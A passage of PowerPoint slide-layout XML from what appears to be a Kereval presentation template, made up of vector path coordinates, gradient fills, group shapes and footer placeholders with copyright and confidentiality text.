                      <a:pt x="3521" y="1521"/>
                      <a:pt x="3521" y="1507"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3521" y="957"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3521" y="911"/>
                      <a:pt x="3516" y="873"/>
                      <a:pt x="3516" y="832"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3509" y="600"/>
                      <a:pt x="3437" y="438"/>
                      <a:pt x="3339" y="313"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3289" y="254"/>
                      <a:pt x="3279" y="246"/>
                      <a:pt x="3224" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2971" y="0"/>
                      <a:pt x="2636" y="14"/>
                      <a:pt x="2636" y="14"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="280" y="14"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="636" y="588"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2583" y="588"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2973" y="612"/>
                      <a:pt x="3014" y="859"/>
                      <a:pt x="3014" y="940"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3014" y="947"/>
                      <a:pt x="3014" y="1514"/>
                      <a:pt x="3014" y="1516"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3014" y="1801"/>
                      <a:pt x="2598" y="1818"/>
                      <a:pt x="2598" y="1818"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2598" y="1818"/>
                      <a:pt x="651" y="1818"/>
                      <a:pt x="641" y="1818"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="529" y="1818"/>
                      <a:pt x="510" y="1732"/>
                      <a:pt x="505" y="1691"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="505" y="703"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="505" y="703"/>
                      <a:pt x="505" y="588"/>
                      <a:pt x="636" y="588"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6465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972720" y="76320"/>
              <a:ext cx="962280" cy="863280"/>
              <a:chOff x="972720" y="76320"/>
              <a:chExt cx="962280" cy="86328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972720" y="76320"/>
                <a:ext cx="811800" cy="771480"/>
                <a:chOff x="972720" y="76320"/>
                <a:chExt cx="811800" cy="771480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="106" name=""/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="1123920" y="164880"/>
                  <a:ext cx="660600" cy="682920"/>
                  <a:chOff x="1123920" y="164880"/>
                  <a:chExt cx="660600" cy="682920"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="107" name=""/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="1613880" y="164880"/>
                    <a:ext cx="170640" cy="40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959" h="7022">
                        <a:moveTo>
                          <a:pt x="2182" y="5875"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2959" y="1679"/>
                          <a:pt x="0" y="0"/>
                          <a:pt x="0" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="0"/>
                          <a:pt x="2901" y="2816"/>
                          <a:pt x="594" y="7022"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1078" y="6805"/>
                          <a:pt x="2042" y="6636"/>
                          <a:pt x="2182" y="587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4c4c4"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="b4b4b4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1541520" y="446040"/>
                    <a:ext cx="198360" cy="327960"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:rect l="l" t="t" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="3435" h="5676">
                        <a:moveTo>
                          <a:pt x="445" y="5459"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2869" y="3859"/>
                          <a:pt x="3435" y="1008"/>
                          <a:pt x="3435" y="1008"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2009" y="176"/>
                          <a:pt x="3030" y="0"/>
                          <a:pt x="1846" y="2156"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1756" y="2320"/>
                          <a:pt x="880" y="3709"/>
                          <a:pt x="0" y="4398"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="142" y="4472"/>
                          <a:pt x="128" y="5676"/>
                          <a:pt x="445" y="5459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3c3c3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="4b4b4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1339920" y="665640"/>
                    <a:ext cx="24444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234" h="2959">
                        <a:moveTo>
                          <a:pt x="199" y="2959"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2306" y="2901"/>
                          <a:pt x="3739" y="1786"/>
                          <a:pt x="3959" y="1642"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4032" y="10"/>
                          <a:pt x="4234" y="0"/>
                          <a:pt x="3475" y="608"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3291" y="751"/>
                          <a:pt x="2317" y="1673"/>
                          <a:pt x="382" y="2120"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="157" y="2346"/>
                          <a:pt x="0" y="2681"/>
                          <a:pt x="199" y="2959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85858"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="43434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1123920" y="755280"/>
                    <a:ext cx="24372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4224" h="1602">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="1839" y="1602"/>
                          <a:pt x="3813" y="1394"/>
                          <a:pt x="3963" y="1406"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3936" y="1103"/>
                          <a:pt x="4224" y="542"/>
                          <a:pt x="4121" y="568"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4121" y="568"/>
                          <a:pt x="2350" y="1054"/>
                          <a:pt x="573" y="269"/>
                        </a:cubicBez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454545"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="46464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1613880" y="164880"/>
                    <a:ext cx="7668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328" h="1574">
                        <a:moveTo>
                          <a:pt x="1328" y="1285"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="833" y="642"/>
                          <a:pt x="512" y="285"/>
                          <a:pt x="0" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="0"/>
                          <a:pt x="476" y="432"/>
                          <a:pt x="1032" y="1574"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1085" y="1341"/>
                          <a:pt x="1133" y="1359"/>
                          <a:pt x="1328" y="128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bdbdbd"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="828282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" name=""/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="972720" y="76320"/>
                  <a:ext cx="640440" cy="676800"/>
                  <a:chOff x="972720" y="76320"/>
                  <a:chExt cx="640440" cy="676800"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="113" name=""/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="1128240" y="76320"/>
                    <a:ext cx="366120" cy="161280"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:rect l="l" t="t" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="6340" h="2790">
                        <a:moveTo>
                          <a:pt x="5763" y="636"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="5763" y="636"/>
                          <a:pt x="4379" y="458"/>
                          <a:pt x="2700" y="1162"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2336" y="1314"/>
                          <a:pt x="1385" y="1695"/>
                          <a:pt x="416" y="2670"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="2790"/>
                          <a:pt x="236" y="2053"/>
                          <a:pt x="284" y="1759"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="881" y="1257"/>
                          <a:pt x="1433" y="982"/>
                          <a:pt x="1954" y="735"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2686" y="377"/>
                          <a:pt x="4013" y="0"/>
                          <a:pt x="5666" y="186"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6340" y="330"/>
                          <a:pt x="6258" y="474"/>
                          <a:pt x="5763" y="63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0e0e0"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="4d4d4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1427040" y="82800"/>
                    <a:ext cx="186120" cy="81360"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:rect l="l" t="t" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="619" h="273">
                        <a:moveTo>
                          <a:pt x="619" y="273"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="619" y="273"/>
                          <a:pt x="427" y="134"/>
                          <a:pt x="113" y="101"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="26" y="58"/>
                          <a:pt x="0" y="0"/>
                          <a:pt x="95" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="413" y="51"/>
                          <a:pt x="619" y="273"/>
                          <a:pt x="619" y="27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1d1d1"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="dadad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972720" y="159840"/>
                    <a:ext cx="191520" cy="59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318" h="10269">
                        <a:moveTo>
                          <a:pt x="3136" y="1198"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="2929" y="1417"/>
                          <a:pt x="1413" y="2776"/>
                          <a:pt x="993" y="5134"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="993" y="5134"/>
                          <a:pt x="657" y="6725"/>
                          <a:pt x="1224" y="8162"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1224" y="8162"/>
                          <a:pt x="1853" y="9795"/>
                          <a:pt x="2568" y="10269"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2568" y="10269"/>
                          <a:pt x="756" y="9458"/>
                          <a:pt x="272" y="6529"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="272" y="6529"/>
                          <a:pt x="0" y="4663"/>
                          <a:pt x="1011" y="2762"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1750" y="1386"/>
                          <a:pt x="2663" y="584"/>
                          <a:pt x="2971" y="319"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3318" y="0"/>
                          <a:pt x="3208" y="727"/>
                          <a:pt x="3136" y="1198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55555"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="46464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6" name=""/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1602720" y="648360"/>
                <a:ext cx="332280" cy="291240"/>
                <a:chOff x="1602720" y="648360"/>
                <a:chExt cx="332280" cy="29124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602720" y="648360"/>
                  <a:ext cx="332280" cy="291240"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="5498" h="4865">
                      <a:moveTo>
                        <a:pt x="528" y="10"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="222" y="36"/>
                        <a:pt x="0" y="325"/>
                        <a:pt x="28" y="646"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="873"/>
                        <a:pt x="191" y="1055"/>
                        <a:pt x="378" y="1134"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4061" y="4583"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4372" y="4865"/>
                        <a:pt x="4814" y="4805"/>
                        <a:pt x="5194" y="4442"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5472" y="4174"/>
                        <a:pt x="5498" y="3552"/>
                        <a:pt x="5283" y="3320"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5161" y="3193"/>
                        <a:pt x="940" y="146"/>
                        <a:pt x="940" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="940" y="146"/>
                        <a:pt x="870" y="93"/>
                        <a:pt x="830" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="755" y="29"/>
                        <a:pt x="669" y="0"/>
                        <a:pt x="528" y="10"/>
                      </a:cubicBez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634760" y="655200"/>
                  <a:ext cx="272880" cy="209880"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="4511" h="3509">
                      <a:moveTo>
                        <a:pt x="4477" y="3463"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4444" y="3509"/>
                        <a:pt x="4360" y="3504"/>
                        <a:pt x="4293" y="3451"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="96" y="218"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="165"/>
                        <a:pt x="0" y="88"/>
                        <a:pt x="36" y="43"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="36" y="43"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="69" y="0"/>
                        <a:pt x="151" y="5"/>
                        <a:pt x="218" y="57"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4418" y="3291"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4485" y="3341"/>
                        <a:pt x="4511" y="3420"/>
                        <a:pt x="4477" y="3463"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4477" y="3463"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="bdbd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610280" y="675360"/>
                  <a:ext cx="306000" cy="264240"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="5056" h="4410">
                      <a:moveTo>
                        <a:pt x="199" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="0"/>
                        <a:pt x="0" y="268"/>
                        <a:pt x="153" y="500"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4037" y="4090"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4037" y="4090"/>
                        <a:pt x="4513" y="4410"/>
                        <a:pt x="5056" y="3817"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5056" y="3817"/>
                        <a:pt x="4674" y="4006"/>
                        <a:pt x="4425" y="3865"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4179" y="3724"/>
                        <a:pt x="414" y="287"/>
                        <a:pt x="414" y="287"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="414" y="287"/>
                        <a:pt x="263" y="184"/>
                        <a:pt x="199" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="46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0" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360360" y="6924600"/>
            <a:ext cx="2879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57575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>4 – Confidential (Staf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" descr="T:\KEREVAL\Qualité\Kit Media Kereval\07_diaporama\V2\Fond_diapo_coin_droit.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9388440" y="0"/>
            <a:ext cx="365040" cy="18954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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8844120" y="6870600"/>
            <a:ext cx="3981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A960-02D6-4933-9831-00F33F839FBB}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1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dt" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4568400" y="6895800"/>
            <a:ext cx="8859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57575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS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C4DE-6278-40B6-8ADB-4C91010FB240}" type="datetime">
              <a:rPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="757575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea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43240" y="6924600"/>
            <a:ext cx="1016280" cy="1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1800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57575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Copyright </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="757575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>©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15840" y="4677840"/>
            <a:ext cx="61182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5202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d52022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815840" y="5908680"/>
            <a:ext cx="61182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6000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="8892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7575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  <a:p>
            <a:pPr lvl="1" marL="88920" indent="-8892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7575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  <a:p>
            <a:pPr lvl="2" marL="88920" indent="-8892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7575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  <a:p>
            <a:pPr lvl="3" marL="88920" indent="-8892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7575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  <a:p>
            <a:pPr lvl="4" marL="88920" indent="-8892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7575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  <a:p>
            <a:pPr lvl="5" marL="88920" indent="-8892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7575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  <a:p>
            <a:pPr lvl="6" marL="88920" indent="-8892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7575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5369040"/>
            <a:ext cx="336600" cy="1946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T:\KEREVAL\Qualité\Kit Media Kereval\07_diaporama\V2\Fond_diapo_coin_droit.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9388440" y="0"/>
            <a:ext cx="365040" cy="189540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358920" y="287280"/>
            <a:ext cx="2158920" cy="1036800"/>
            <a:chOff x="358920" y="287280"/>
            <a:chExt cx="2158920" cy="1036800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="166" name=""/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1424520" y="420120"/>
              <a:ext cx="766080" cy="554400"/>
              <a:chOff x="1424520" y="420120"/>
              <a:chExt cx="766080" cy="554400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="167" name=""/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1424520" y="578520"/>
                <a:ext cx="315720" cy="391680"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4353" h="5451">
                    <a:moveTo>
                      <a:pt x="4030" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3992" y="0"/>
                      <a:pt x="3937" y="5"/>
                      <a:pt x="3894" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3817" y="60"/>
                      <a:pt x="3765" y="125"/>
                      <a:pt x="3731" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3717" y="204"/>
                      <a:pt x="3647" y="335"/>
                      <a:pt x="3604" y="445"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3183" y="1488"/>
                      <a:pt x="2239" y="3897"/>
                      <a:pt x="2239" y="3897"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2181" y="4040"/>
                      <a:pt x="2126" y="4117"/>
                      <a:pt x="2078" y="4117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2033" y="4119"/>
                      <a:pt x="1976" y="4038"/>
                      <a:pt x="1911" y="3870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1705" y="3339"/>
                      <a:pt x="521" y="426"/>
                      <a:pt x="521" y="426"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="1000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1744" y="5116"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1849" y="5365"/>
                      <a:pt x="2248" y="5451"/>
                      <a:pt x="2382" y="5126"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="4190" y="778"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="4190" y="778"/>
                      <a:pt x="4348" y="440"/>
                      <a:pt x="4351" y="326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4353" y="161"/>
                      <a:pt x="4293" y="103"/>
                      <a:pt x="4229" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4164" y="15"/>
                      <a:pt x="4092" y="3"/>
                      <a:pt x="4030" y="3"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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013480" y="583200"/>
                <a:ext cx="177120" cy="391320"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2442" h="5446">
                    <a:moveTo>
                      <a:pt x="327" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="0"/>
                      <a:pt x="0" y="163"/>
                      <a:pt x="0" y="361"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="3944"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="3944"/>
                      <a:pt x="9" y="4111"/>
                      <a:pt x="14" y="4150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="189" y="5446"/>
                      <a:pt x="1313" y="5276"/>
                      <a:pt x="1480" y="5245"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2164" y="5245"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2317" y="5245"/>
                      <a:pt x="2442" y="5066"/>
                      <a:pt x="2442" y="4841"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2442" y="4618"/>
                      <a:pt x="2317" y="4437"/>
                      <a:pt x="2164" y="4437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2164" y="4437"/>
                      <a:pt x="1492" y="4434"/>
                      <a:pt x="1463" y="4434"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="648" y="4446"/>
                      <a:pt x="655" y="4001"/>
                      <a:pt x="655" y="3944"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="655" y="361"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="655" y="163"/>
                      <a:pt x="509" y="0"/>
                      <a:pt x="327" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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785600" y="420120"/>
                <a:ext cx="106200" cy="108720"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1466" h="1516">
                    <a:moveTo>
                      <a:pt x="0" y="777"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="533"/>
                      <a:pt x="69" y="344"/>
                      <a:pt x="206" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="342" y="67"/>
                      <a:pt x="519" y="0"/>
                      <a:pt x="734" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="875" y="0"/>
                      <a:pt x="1002" y="31"/>
                      <a:pt x="1117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1229" y="160"/>
                      <a:pt x="1318" y="251"/>
                      <a:pt x="1375" y="366"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1435" y="483"/>
                      <a:pt x="1466" y="614"/>
                      <a:pt x="1466" y="760"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1466" y="908"/>
                      <a:pt x="1435" y="1042"/>
                      <a:pt x="1373" y="1160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1308" y="1277"/>
                      <a:pt x="1220" y="1365"/>
                      <a:pt x="1105" y="1427"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="990" y="1487"/>
                      <a:pt x="866" y="1516"/>
                      <a:pt x="732" y="1516"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="588" y="1516"/>
                      <a:pt x="459" y="1483"/>
                      <a:pt x="347" y="1418"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="232" y="1351"/>
                      <a:pt x="146" y="1260"/>
                      <a:pt x="88" y="1143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="1028"/>
                      <a:pt x="0" y="906"/>
                      <a:pt x="0" y="777"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="210" y="779"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="210" y="956"/>
                      <a:pt x="258" y="1097"/>
                      <a:pt x="359" y="1198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="457" y="1301"/>
                      <a:pt x="581" y="1351"/>
                      <a:pt x="732" y="1351"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="885" y="1351"/>
                      <a:pt x="1009" y="1301"/>
                      <a:pt x="1110" y="1198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1208" y="1095"/>
                      <a:pt x="1256" y="949"/>
                      <a:pt x="1256" y="760"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1256" y="641"/>
                      <a:pt x="1234" y="535"/>
                      <a:pt x="1193" y="447"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1150" y="358"/>
                      <a:pt x="1088" y="289"/>
                      <a:pt x="1007" y="239"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="928" y="191"/>
                      <a:pt x="837" y="165"/>
                      <a:pt x="734" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="591" y="165"/>
                      <a:pt x="469" y="212"/>
                      <a:pt x="364" y="308"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="261" y="401"/>
                      <a:pt x="210" y="559"/>
                      <a:pt x="210" y="779"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="d520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666080" y="579600"/>
                <a:ext cx="333720" cy="386280"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4602" h="5376">
                    <a:moveTo>
                      <a:pt x="2313" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2100" y="0"/>
                      <a:pt x="2014" y="158"/>
                      <a:pt x="1990" y="215"/>
